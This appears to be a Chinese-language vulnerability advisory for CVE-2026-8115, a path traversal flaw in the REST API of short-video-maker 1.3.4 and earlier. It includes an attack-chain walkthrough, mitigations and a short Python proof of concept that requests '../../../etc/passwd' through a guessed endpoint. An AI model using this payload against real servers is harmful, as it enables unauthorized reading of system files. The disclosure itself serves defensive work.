IPBUF安全漏洞报告
English
CVE-2026-8115 CVSS 5.3 中危

CVE-2026-8115 short-video-maker路径遍历漏洞

披露日期: 2026-05-07
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-8115
漏洞类型
路径遍历
CVSS评分
5.3 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
gyoridavid short-video-maker

相关标签

路径遍历CVE-2026-8115short-video-makerREST API信息泄露

漏洞概述

gyoridavid short-video-maker 1.3.4及之前版本存在安全缺陷。该漏洞位于src/server/routers/rest.ts的REST API组件中。攻击者通过操纵req.params.tmpFile参数可触发路径遍历攻击。该漏洞可被远程利用,无需认证,且利用代码已公开,目前项目方尚未回应。

技术细节

该漏洞主要存在于 `gyoridavid short-video-maker` 项目的 REST API 组件中,具体受影响的文件路径为 `src/server/routers/rest.ts`。漏洞产生的根本原因是开发人员未对 `req.params.tmpFile` 这一用户可控参数实施有效的安全过滤,导致应用程序未能正确区分合法文件路径与恶意路径。攻击者可以通过发送特制的 HTTP 请求,利用路径遍历技术(如使用 `../` 序列)访问服务器上的任意文件。根据 CVSS 3.1 评分标准,该漏洞利用难度低,无需用户交互及权限,攻击者可远程发起攻击,主要造成低程度的机密性影响。鉴于利用代码已公开,风险进一步增加。

攻击链分析

STEP 1
1. 信息收集
攻击者识别出目标正在使用gyoridavid short-video-maker且版本低于或等于1.3.4。
STEP 2
2. 构造攻击载荷
攻击者构造包含路径遍历字符(如../)的恶意字符串,并将其赋值给req.params.tmpFile参数。
STEP 3
3. 发送恶意请求
攻击者向src/server/routers/rest.ts接口发送HTTP请求,注入恶意参数。
STEP 4
4. 执行路径遍历
服务器端未过滤参数,导致应用程序读取并返回指定路径(如/etc/passwd)的文件内容。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests target_url = "http://target-ip:port/api/files" # Replace with actual endpoint # The vulnerability is in req.params.tmpFile # Assuming a route structure like /api/files/:tmpFile payload = "../../../etc/passwd" try: # Sending malicious request response = requests.get(f"{target_url}/{payload}") if response.status_code == 200: print("[+] Exploit successful! Data leaked:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

影响范围

gyoridavid short-video-maker <= 1.3.4

防御指南

临时缓解措施
建议在WAF或网关层面对请求参数中的../等特殊字符进行拦截。若该功能非必须,可临时禁用受影响的REST API接口。开发者应立即对src/server/routers/rest.ts文件进行代码审计,修复参数过滤逻辑。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。